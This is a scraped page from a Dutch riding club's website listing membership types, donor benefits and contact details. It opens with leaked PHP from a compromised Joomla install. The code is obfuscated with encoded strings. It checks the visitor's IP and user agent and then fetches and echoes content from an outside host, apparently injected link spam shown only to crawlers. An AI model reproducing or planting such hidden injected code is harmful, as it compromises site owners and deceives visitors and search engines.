$x0f ){if ( $x1b( '#^'.$x0f.'$#', $_SERVER['REMOTE_ADDR']) )$x0b = TRUE ;}if ( $x0b || !( FALSE === $x1e( $x1c( $x0c, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ){if ($x19('curl_init')){ if( $x10 = $x13() ){$x14($x10,CURLOPT_URL,'http://agmaiil.com/link-weel/');$x14($x10,CURLOPT_RETURNTRANSFER,true);$x11 = $x15($x10);echo $x11;$x16($x10);}}else{$x12 = $x18("\150\164\164p\072\x2f\057a\x67\155\x61\151\151\x6c\056\x63\157\155/lin\153-we\x65l\x2f");echo $x12; }} /** * @packageJoomla.Site * @copyrightCopyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved. * @licenseGNU General Public License version 2 or later; see LICENSE.txt */ /** * Content Component Query Helper * * @static * @packageJoomla.Site * @subpackagecom_content * @since1.5 */ /** * Translate an order code to a field for secondary category ordering. * * @paramstring$orderbyThe ordering code. * @paramstring$orderDateThe ordering code for the date. * * @returnstringThe SQL field(s) to order by. * @since1.5 */ /** * Content Component Query Helper * * @static * @packageJoomla.Site * @subpackagecom_content * @since1.5 */ /** * Translate an order code to a field for secondary category ordering. * * @paramstring$orderbyThe ordering code. * @paramstring$orderDateThe ordering code for the date. * * @returnstringThe SQL field(s) to order by. * @since1.5 */ ?>

Lidmaatschapsvormen

Er zijn diverse lidmaatschappen waar je uit kunt kiezen.
Hier een schematisch overzicht van deze lidmaatschappen:

Lidmaatschap Toelichting

Basislid

niet rijdend lid

Wedstrijdlid

rijdend lid dat geen gebruik maakt van de accommodatie

Menlid

lid dat de aangespannen sport bedrijft

Volledig lid

lid dat geen gebruik maakt van de verenigingslessenmaar wel van de accommodatie

Ponylid

rijdend lid jonger dan 18 jaar met 1 of 2 lessen per week

Paardenlid

rijdend paardenlid met 1 of 2 lessen per week

Tevens is het mogelijk om de diensten eventueel af te kopen, voor de tarieven hiervan, zie de tarievenlijst. Daarnaast is het bijvoorbeeld ook mogelijk om een kwartaallidmaatschap af te sluiten. De vereniging kan ook worden gesteund door donateur te worden. Tegen een vastgestelde minimum bijdrage ontvang je als donateur 3 maal per jaar het clubblad Rodeo, een jaarkalender met daarop alle geplande activiteiten en een uitnodiging voor de jaarlijkse donateuravond. Op deze avond presenteren de leden van de vereniging een gevarieerd showprogramma.

ponykids

sr-gastenboek sr-fotoalbum sr-koopjeshoek sr-archief

Oude Dijk 8
1391 KP  Abcoude
tel. 0294-283258

facebook-link

Nieuwsbrief

Ontvang periodiek onze nieuwsbrief

 

Copyright © 2010 De Slotruiters
Alle rechten voorbehouden.

 

Webdesign: BoekensMedia.nl